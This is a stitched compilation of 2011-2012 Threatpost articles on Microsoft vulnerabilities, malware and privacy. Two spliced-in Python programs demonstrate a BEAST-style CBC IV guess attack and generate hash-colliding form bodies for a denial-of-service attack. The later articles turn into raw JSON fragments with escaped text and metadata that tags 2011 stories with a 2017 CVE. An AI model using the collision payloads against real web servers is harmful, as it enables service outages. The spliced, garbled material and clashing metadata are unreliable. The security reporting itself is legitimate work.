The vulnerability fixed by [MS12-006](<https://technet.microsoft.com/en-us/security/bulletin/ms12-006>) actually lies in the SSL 3.0/TLS 1.0 protocol: with CBC cipher suites, those protocol versions use the last ciphertext block of one record as the IV for the next, so the IV is predictable to anyone watching the connection. The attack that Rizzo and Duong developed and released in September uses that to recover encrypted data, such as session cookies, from users’ SSL sessions on the fly and hijack them, including sessions with online banking sites and other sensitive sites. The weakness has been known for a long time, but it wasn’t until last year that a practical exploitation of it surfaced.

“This vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker intercepts encrypted web traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected,” Microsoft said in its bulletin. “The security update addresses the vulnerability by modifying the way that the Windows Secure Channel (SChannel) component sends and receives encrypted network packets.”

The highest priority bulletin for the January release is [MS12-004](<https://blogs.technet.com/b/srd/archive/2012/01/10/more-information-on-ms12-004.aspx?Redirected=true>), which includes fixes for two vulnerabilities in Windows Media Player. One of the bugs in that bulletin is the only critical one fixed in January, and it’s a remote code execution flaw. It affects Windows XP, Vista, Server 2003 and Server 2008.

There’s also a vulnerability in the Windows kernel that has the effect of allowing attackers to bypass one of the exploit-mitigation technologies in Windows, SafeSEH.
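Before returning to the kernel bulletin, here is the guess-check at the heart of the CBC weakness that MS12-006 addresses, as an added illustration (this is not code from the article, from Microsoft or from the BEAST authors). With SSL 3.0/TLS 1.0 CBC, the IV of each record is the last ciphertext block of the previous record, so a passive observer knows the IV before the next record is encrypted and can test a guess for one plaintext block with a single chosen record; TLS 1.1 sends a fresh random IV with every record, so the same test fails, which is why Microsoft's bulletin lists TLS 1.1, TLS 1.2 and non-CBC suites as unaffected. The block cipher below is a toy Feistel network built on SHA-256 standing in for AES (so the file runs offline; it is not secure), the record contents are constructed, and the attacker is assumed to be able to get one chosen block encrypted under the victim's key, which is the capability BEAST obtains through the browser.

```python
"""Why the chained IV of SSL 3.0 / TLS 1.0 CBC lets an eavesdropper test
plaintext guesses, and why a fresh per-record IV (TLS 1.1) does not.

Added example, not code from the article, Microsoft or the BEAST authors.
The block cipher is a toy 4-round Feistel network on SHA-256 standing in
for AES so the file runs offline; it is NOT secure.  Record contents are
constructed sample data.
"""
import hashlib
import os

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Round function: keyed hash truncated to one half-block.
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 16-byte block permutation (stand-in for AES-128 encryption)."""
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


class ChainedIvSender:
    """TLS 1.0 style CBC: the IV for a record is the last ciphertext block of
    the previous record, which has already been sent over the wire."""
    explicit_iv = False

    def __init__(self, key: bytes):
        self.key = key
        self.last_block = os.urandom(BLOCK)   # initial IV

    def next_iv(self) -> bytes:
        """What a passive observer predicts the next IV will be."""
        return self.last_block

    def send(self, plaintext: bytes) -> bytes:
        assert len(plaintext) % BLOCK == 0, "caller pads to the block size"
        out, prev = b"", self.last_block
        for i in range(0, len(plaintext), BLOCK):
            prev = block_encrypt(self.key, _xor(plaintext[i:i + BLOCK], prev))
            out += prev
        self.last_block = prev
        return out


class FreshIvSender(ChainedIvSender):
    """TLS 1.1 style CBC: a random IV per record, sent in front of the record."""
    explicit_iv = True

    def send(self, plaintext: bytes) -> bytes:
        self.last_block = os.urandom(BLOCK)   # unpredictable until it is on the wire
        return self.last_block + super().send(plaintext)


def recover_last_byte(sender, c_prev: bytes, c_target: bytes, known15: bytes):
    """BEAST-style guess check for one unknown byte.

    The victim's block P = known15 || b was encrypted as c_target = E(P ^ c_prev).
    For each guess g the attacker has the sender encrypt one chosen block
    X = g ^ c_prev ^ predicted_iv.  With a chained IV the sender computes
    E(X ^ iv) = E(g ^ c_prev), which equals c_target exactly when g == P.
    Returns the recovered byte, or None if no guess matched."""
    for b in range(256):
        guess = known15 + bytes([b])
        chosen = _xor(_xor(guess, c_prev), sender.next_iv())
        produced = sender.send(chosen)[-BLOCK:]
        if produced == c_target:
            return b
    return None


def run_attack(sender_cls):
    """Victim sends a record holding one secret byte; the attacker tries to recover it."""
    sender = sender_cls(os.urandom(16))
    sender.send(b"GET / HTTP/1.1\r\n")            # 16-byte warm-up record on the wire
    predicted_iv = sender.next_iv()               # public: last ciphertext block seen
    known15, secret = b"session-id=00FF", b"7"    # constructed: 15 known bytes + 1 secret
    wire = sender.send(known15 + secret)
    if sender.explicit_iv:                        # TLS 1.1: IV travels with the record
        c_prev, c_target = wire[:BLOCK], wire[BLOCK:]
    else:                                         # TLS 1.0: IV was the previous last block
        c_prev, c_target = predicted_iv, wire
    return recover_last_byte(sender, c_prev, c_target, known15)


if __name__ == "__main__":
    print("chained IV (TLS 1.0):", run_attack(ChainedIvSender))   # 55 == ord("7")
    print("fresh IV   (TLS 1.1):", run_attack(FreshIvSender))     # None
```

Run it and the chained-IV sender gives up the byte within 256 chosen records, while the fresh-IV sender never produces a matching block. The real attack additionally needs a way to inject chosen plaintext into the victim's session and shifts the secret so that one unknown byte at a time sits at a block boundary; the demo shows only the per-guess check that makes those steps worthwhile.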
After bypassing SafeSEH, an attacker could then use other bugs to compromise an affected machine.

“This issue can result in SafeSEH not being enforced for a binary that has been built with support for SafeSEH. This occurs when a binary that was built with Microsoft Visual C++ .NET 2003 RTM is loaded by an application running on a version of Windows that is affected by MS12-001,” Microsoft said in the bulletin.

“The reason that SafeSEH is not enforced in this scenario is because Microsoft Visual C++ .NET 2003 RTM produces binaries with metadata that is a different size than what the Windows loader expects. As a result, the loader conservatively falls back to assuming that the binary does not support SafeSEH. MS12-001 addresses this issue by allowing binaries to have metadata of the size that is produced by Microsoft Visual C++ .NET 2003 RTM.”

## Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday

*Threatpost, published 2012-01-06: <https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/>*

Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, six of them rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.

Just three of the seven bulletins Microsoft will issue on Jan. 10 will fix a vulnerability that could lead to remote code execution. The others can lead either to elevation of privilege or to information disclosure. However, there is one bulletin that Microsoft has said can also lead to “security feature bypass,” something that isn’t typically seen on the company’s security bulletins.

“In addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, ‘Security Feature Bypass,’ for one of our Important-severity bulletins. SFB-class issues in themselves can’t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,” Microsoft’s Angela Gunn wrote in a blog post.

The company will release full information on the patches and which vulnerabilities they apply to on Tuesday.

## Microsoft to Release Emergency Fix for ASP.NET DoS Flaw

*Threatpost, published 2011-12-29: <https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/>*

**UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request.
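As an added illustration of the mechanism Microsoft's engineers describe below (not code from Microsoft or from the researchers): a toy form parser that stores field names in a chained hash table keyed by a deterministic 31-multiplier string hash. That hash (the Java-style one, reduced to 32 bits) is used here only because colliding inputs are trivial to construct for it; the affected runtimes used different but similarly predictable functions. Every colliding name lands in the same bucket, so inserting n names costs about n²/2 key comparisons, which is the CPU burn the advisory talks about. A hash seeded with a per-process secret takes away the attacker's ability to precompute collisions, and the caps on body size and field count are the kind of limit the workaround imposes; the names `weak_hash`, `ChainedTable`, `parse_form` and the numeric limits are this example's own assumptions.

```python
"""Toy model of the form-parsing hash-collision DoS behind MS11-100.

Added example, not Microsoft's or the researchers' code.  The weak hash is
the 31-multiplier string hash (Java-style, reduced to 32 bits), used here
because colliding inputs are trivial to construct for it.  Limits are
arbitrary assumptions chosen for the demo.
"""
import hashlib
import os

MASK32 = 0xFFFFFFFF


def weak_hash(s: str) -> int:
    """h = h*31 + c (mod 2**32): deterministic, so collisions can be precomputed."""
    h = 0
    for ch in s:
        h = (h * 31 + ord(ch)) & MASK32
    return h


def make_keyed_hash(key: bytes):
    """Hash seeded with a per-process secret; the attacker cannot predict buckets."""
    def keyed(s: str) -> int:
        digest = hashlib.blake2b(s.encode(), key=key, digest_size=4).digest()
        return int.from_bytes(digest, "big")
    return keyed


class ChainedTable:
    """Separate-chaining hash table that counts key comparisons: the work that
    becomes quadratic when every key lands in the same bucket."""

    def __init__(self, hash_fn, nbuckets: int = 1024):
        self.hash_fn = hash_fn
        self.buckets = [[] for _ in range(nbuckets)]
        self.comparisons = 0

    def insert(self, key: str, value: str) -> None:
        bucket = self.buckets[self.hash_fn(key) % len(self.buckets)]
        for entry in bucket:          # linear scan of the chain for a duplicate key
            self.comparisons += 1
            if entry[0] == key:
                entry[1] = value
                return
        bucket.append([key, value])


def colliding_names(k: int) -> list:
    """2**k distinct names with the same weak_hash.  'Aa' and 'BB' collide
    (65*31+97 == 66*31+66 == 2112), and equal-length pieces with equal hashes
    still collide after concatenation: the 'equivalent substrings' trick."""
    names = [""]
    for _ in range(k):
        names = [n + piece for n in names for piece in ("Aa", "BB")]
    return names


def attack_body(k: int) -> str:
    """Constructed application/x-www-form-urlencoded body with 2**k colliding fields."""
    return "&".join(f"{name}=x" for name in colliding_names(k))


class RequestRejected(ValueError):
    pass


def parse_form(body: str, hash_fn, max_body_bytes=None, max_fields=None) -> ChainedTable:
    """Parse a form body into a ChainedTable.  Both limits (assumed values) are
    checked before any hashing, so an oversized request costs almost nothing."""
    if max_body_bytes is not None and len(body.encode()) > max_body_bytes:
        raise RequestRejected("request body too large")
    pairs = body.split("&") if body else []
    if max_fields is not None and len(pairs) > max_fields:
        raise RequestRejected("too many form fields")
    table = ChainedTable(hash_fn)
    for pair in pairs:
        name, _, value = pair.partition("=")
        table.insert(name, value)
    return table


def comparisons_for(body: str, hash_fn) -> int:
    """Key comparisons spent parsing `body` with the given hash function."""
    return parse_form(body, hash_fn).comparisons


def is_rejected(body: str, **limits) -> bool:
    """True if the request is refused by the given limits before parsing."""
    try:
        parse_form(body, weak_hash, **limits)
        return False
    except RequestRejected:
        return True


if __name__ == "__main__":
    body = attack_body(10)                     # 1024 colliding field names, ~23 KB
    print("weak hash comparisons:  ", comparisons_for(body, weak_hash))            # 523776
    print("keyed hash comparisons: ", comparisons_for(body, make_keyed_hash(os.urandom(16))))
    print("rejected by field cap:  ", is_rejected(body, max_fields=1000))          # True
```

With 1024 colliding names the weak hash does 1024·1023/2 = 523,776 comparisons for a body of about 23 KB; the keyed hash spreads the same names over the buckets and does a few hundred. Raising k to 13 (8,192 names, still well under the ~100 KB the Microsoft quote mentions) pushes the weak case past 33 million comparisons, which is the quadratic blow-up that a request-size or field-count cap cuts off before it starts.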
A wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they’re releasing the patch now because they’re expecting exploit code to be released in the near future.

The vulnerability was discussed at the Chaos Communication Congress conference in Germany earlier this week, although some form of the problem has been known for several years. In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.

Microsoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.

“This vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 – 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,” [Microsoft’s Suha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.

“The root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.”

In its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. The workaround decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible to the attack.

“This configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,” the advisory says.

The security researchers who published details of the vulnerability, Alexander Klink and Julian Wälde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>).

## Researchers Warn of New Windows 7 Vulnerability

*Threatpost, published 2011-12-20: <https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/>*

Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine.
The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.

In a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim’s machine.

“A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user’s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large ‘height’ attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,” the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.

Microsoft officials have not confirmed the vulnerability, but said that they’re looking into it.

“We are currently examining the issue and will take appropriate action to help ensure the customers are protected,” Jerry Bryant, group manager of response communications in Microsoft’s Trustworthy Computing Group, said.

The only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. It’s not clear how many of those Safari users are running Windows, but it’s likely that the vast majority of them are running Mac OS X.

However, it’s possible that other browsers will turn out to be usable as attack vectors for this vulnerability as more information becomes available.

## Microsoft Unveils New Windows Defender Offline Tool

*Threatpost, published 2011-12-09: <https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/>*

Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don’t have the ability to reach the Internet. The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.

In some ways, the new tool is a throwback to the bygone days of computing and viruses, when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation.
Microsoft’s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.

There are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.

A user who finds herself in such a situation would be able to boot her PC from the CD or USB drive containing the offline tool and then proceed with the malware cleaning.

“Windows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it’s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,” Microsoft’s documentation for the Windows Defender Offline tool says.

The new tool is currently in beta form, but it’s available for download from Microsoft’s site now.

## Adam Shostack on Methods of Compromise, the New School and Learning

*Threatpost, published 2011-12-12: <https://threatpost.com/adam-shostack-methods-compromise-new-school-and-learning-121211/75984/>*

Dennis Fisher talks with Adam Shostack of Microsoft about the taxonomy he helped develop for classifying how PCs are compromised, what he would and wouldn’t change in The New School of Information Security and who he’s learned the most from.

*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)*

Subscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>).

Image via [adamshostack](<http://www.flickr.com/photos/adamshostack/7308776486/in/photolist-c8RoBG/lightbox/>)’s Flickr photostream, Creative Commons

## New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot

*Threatpost, published 2011-11-17: <https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/>*

A security researcher who has in the past created low-level rootkits capable of staying resident on an infected machine across reboots said he has now accomplished the same feat on Windows 8, which hasn’t even hit the shelves yet. Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.

Kleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. He said in a message on Twitter Thursday that Stoned Lite is a small-footprint bootkit that can be loaded from either a USB stick or a CD.

He said he may also add some other functionality to the software in the near future.

“Might add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,” Kleissner said in a later Twitter message.

The pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is building Windows 8 around UEFI firmware](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI’s Secure Boot feature lets the firmware require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware.
Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn’t necessarily the case.

Kleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he’s written for a conference presentation.

Microsoft has not confirmed the details of Kleissner’s claims.

## New Toolkit Able to Track and Trace Duqu Worm

*Threatpost, published 2011-11-10: <https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/>*

The Hungarian research facility that helped discover Duqu, the [much-blogged-about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.

The Laboratory of Cryptography and System Security (CrySyS) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu, a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran, famously had a hard-coded 36-day lifespan. But systems may still retain certain Duqu files even after the malware has deactivated itself. By focusing on what they refer to as “suspicious files,” the toolkit can “detect new, modified versions of the Duqu threat,” CrySyS said.

Like other toolkits, CrySyS says, the tool could still generate false positives, and it therefore encourages having a professional look over the log files of each test.

As Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a specially crafted Word document that exploits a flaw in Windows’ Win32k TrueType font parsing engine, leading to remote code execution. Microsoft has said it is working on a patch for the bug and, in the meantime, [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.

## Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking

*Threatpost, published 2011-09-28: <https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/>*

Redmond, Washington-based software giant Microsoft and Detroit-based GM subsidiary OnStar have backtracked on policies widely seen as egregious privacy violations, following lawsuits and public outcry.
Here’s the news:

**Windows Phone Update Requires User Consent For Tracking**

Microsoft has released its “Mango” update for Windows Phone, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), addresses widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) alleging that the company had been tracking device locations without reasonable consent.

In a location and privacy FAQ on the Microsoft website, the company maintains that the location information stored on Windows Phone 7 devices is meant to gather information about nearby Wi-Fi access points so that location-based services can be delivered more efficiently and effectively, and that this information does not uniquely identify or track devices.

However, the company also says it discovered that some of that information had been periodically relayed back to Microsoft when users accessed the Camera application and used its US-English voice command feature. (Whoops!) This relay of information, Microsoft says, was unintended behavior. The latest update resolves these and other issues. Users must now opt in before the Camera application tags photos with their location. Voice Command will no longer request location information at all.

For more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).

**OnStar Won’t Force Automated Location Tracking**

OnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even for owners who had opted out of or cancelled OnStar’s services.

A press release published yesterday on the OnStar website announced that the company is revising its proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.

“We realize that our proposed amendments did not satisfy our subscribers,” OnStar President Linda Marshall said in the statement. “This is why we are leaving the decision in our customers’ hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.”

The appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). An analysis by the Wall Street Journal found that iPhones running version 4 of Apple’s iOS operating system appeared to [track a user’s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) regardless of whether the user had enabled or disabled location services. Like Microsoft, Apple claimed that the phones weren’t tracking specific users’ movements, just using the company’s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, too, have been found collecting location data, often quite apart from the kind of service they provide. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>).

Security experts have wondered aloud [how else Apple might use the location and movement data it collects](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third-party advertisers.

*Threatpost: <https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/>*

Microsoft officials are seeking to assuage concerns that its implementation of UEFI in Windows 8 will prevent users from loading non-Microsoft operating systems or applications on their machines.
Despite concerns raised by security researchers and open-source advocates about vendor lock-in and other issues arising from the use of a secure boot sequence in the upcoming OS, Microsoft says \u201cthe customer is in control of their PC.\u201d\n\nIn the days since Microsoft began talking about the details of Windows 8 and the security measures that it has added to the new version of the OS, security researchers and others have raised questions about the consequences of the implementation of the secure boot sequence that includes UEFI instead of a traditional BIOS underneath the firmware. The boot sequence for Windows 8, which is due in 2012, will be markedly different from that of its predecessors. The most notable difference is that the firmware will only load code that is signed and authenticated by a key that\u2019s embedded in the PC hardware. Any module that isn\u2019t signed won\u2019t be loaded.\n\nThe goal of this is to prevent malware such as rootkits and bootkits from staying resident on machines and reloading each time the machine is restarted. Such malware variants have become more popular in recent years as attackers have looked for new methods of keeping their attack tools on infected machines for a long period of time. That kind of malware can be difficult to detect and remove, and so Microsoft is hoping that the secure boot sequence using UEFI will help prevent it and other malicious software from making its way onto the PC in the first place.\n\n\u201cIn most PCs today, the pre-operating system environment is vulnerable to attacks by redirecting the boot loader handoff to possible malicious loaders. 
These loaders would remain undetected to operating system security measures and antimalware software,\u201d Microsoft\u2019s [Tony Mangefeste](<https://blogs.msdn.com/b/b8/archive/2011/09/22/protecting-the-pre-os-environment-with-uefi.aspx>) wrote in a post explaining the architectural change.\n\nHowever, critics have raised concerns that the system also gives Microsoft the ability to prevent users from running third-party operating systems such as Linux on their PCs. Ross Anderson, a security researcher at the University of Cambridge, said in a blog post yesterday that the move by Microsoft could have serious consequences.\n\n\u201cThe extension of Microsoft\u2019s OS monopoly to hardware would be a disaster, with increased lock-in, decreased consumer choice and lack of space to innovate. It is clearly [unlawful](<http://en.wikipedia.org/wiki/Article_82>) and must not succeed,\u201d Anderson wrote.\n\nMangefeste said that the secure boot sequence is designed to prevent malware from loading and not to stop users from loading other software they want to run, including alternate operating systems.\n\n\u201cAt the end of the day, the customer is in control of their PC. Microsoft\u2019s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves. We work with our OEM ecosystem to provide customers with this flexibility. The security that UEFI has to offer with secure boot means that most customers will have their systems protected against boot loader attacks. For the enthusiast who wants to run older operating systems, the option is there to allow you to make that decision,\u201d Mangefeste wrote.\n\n\u201cA demonstration of this control is found in the Samsung tablet with Windows 8 Developer Preview that was offered to //BUILD/ participants. In the screenshot below you will notice that we designed the firmware to allow the customer to disable secure boot. 
However, doing so comes at your own risk.\u201d\n", "cvss3": {}, "published": "2011-09-23T15:14:43", "type": "threatpost", "title": "Microsoft Defends Secure Boot in Windows 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:43", "id": "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "href": "https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/75683/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:47", "description": "[](<https://threatpost.com/alureon-rootkit-morphs-again-adds-steganography-092611/>)The [Alureon rootkit](<https://threatpost.com/tdl4-rootkit-bypasses-windows-code-signing-protection-111610/>) has become not just a major headache for its victims, with its insidious infection routines and persistence once on a machine. But it also has proved to be a challenge for researchers engaged in trying to identify new versions and unwind its new tactics and techniques. The latest hurdle thrown up by Alureon is the use of steganography to hide configuration files to update infected machines with new instructions.\n\nThe steganography usage has shown up in a specific version of Alureon that often is downloaded by a Trojan and then installed on the victim\u2019s machine. The malware has a new function that goes out to a remote Web site and downloads a new component called \u201ccom32\u201d, which, once decrypted, presents a list of URLs hosted on LiveJournal and WordPress. Each of the pages simply hosts a series of image files, which look to be harmless at first glance. 
But when [researchers at Microsoft](<https://blogs.technet.com/b/mmpc/archive/2011/09/25/a-tale-of-grannies-chinese-herbs-tom-cruise-alureon-and-steganography.aspx>) looked deeper into the code that is responsible for retrieving the image files, they discovered that the code looks specifically for some IMG HTML tags.\n\nThe rootkit then tries to pull down the JPEGs, and along with the image data comes a long string of characters that looks to be a password of some kind, according to the analysis by Scott Molenkamp of Microsoft\u2019s Malware Protection Center.\n\n\u201cAfter further investigation, I was able to determine that embedded within each of the JPGs was a complete configuration file using steganography. One of the critical sections of the configuration file contains the list of command and control servers. The purpose of the publically hosted data was revealed \u2014 it\u2019s there to provide a layer of redundancy and defense against existing domains that might become unavailable. In the event that no command and control server could be contacted, Alureon would then seek to retrieve an updated configuration file from these \u2018backup\u2019 locations,\u201d [Molenkamp](<https://blogs.technet.com/b/mmpc/archive/2011/09/25/a-tale-of-grannies-chinese-herbs-tom-cruise-alureon-and-steganography.aspx>) wrote.\n\nThe images being used to hide the configuration file look to be completely random, unless the attacker behind Alureon is a health nut who loves his grandma and \u201cTropic Thunder.\u201d The JPEGs include a picture of an elderly woman, a bowl of something sort of health-food looking and\u2026Tom Cruise.\n\nAlureon, which also is known as TDSS or TDL4, has been a serious problem for a couple of years now. The addition of a steganography routine is just the latest in a line of new features added to the malware in the last few months. 
Earlier this year researchers came across a version of Alureon that was using an older brute-force technique in order to decrypt some components of its own code that are encrypted. And in June another variant appeared that had its own self-replicating loader which allowed [Alureon to spread via network shares](<https://threatpost.com/tdss-rootkit-gets-its-own-self-replicating-loader-060311/>) once it\u2019s on a victim\u2019s machine.\n", "cvss3": {}, "published": "2011-09-26T15:51:13", "type": "threatpost", "title": "Alureon Rootkit Morphs Again, Adds Steganography", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:42", "id": "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "href": "https://threatpost.com/alureon-rootkit-morphs-again-adds-steganography-092611/75688/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:57", "description": "Dennis Fisher talks with Katie Moussouris of Microsoft about the company\u2019s new [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) for innovative defensive security technology, why Microsoft didn\u2019t start a bug bounty program and whether this will become an annual contest.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-08-24T11:45:50", "type": "threatpost", "title": "Katie Moussouris on the Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T20:01:36", "id": "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "href": "https://threatpost.com/katie-moussouris-microsoft-blue-hat-prize-082411/75575/", "cvss": {"score": 9.3, "vector": 
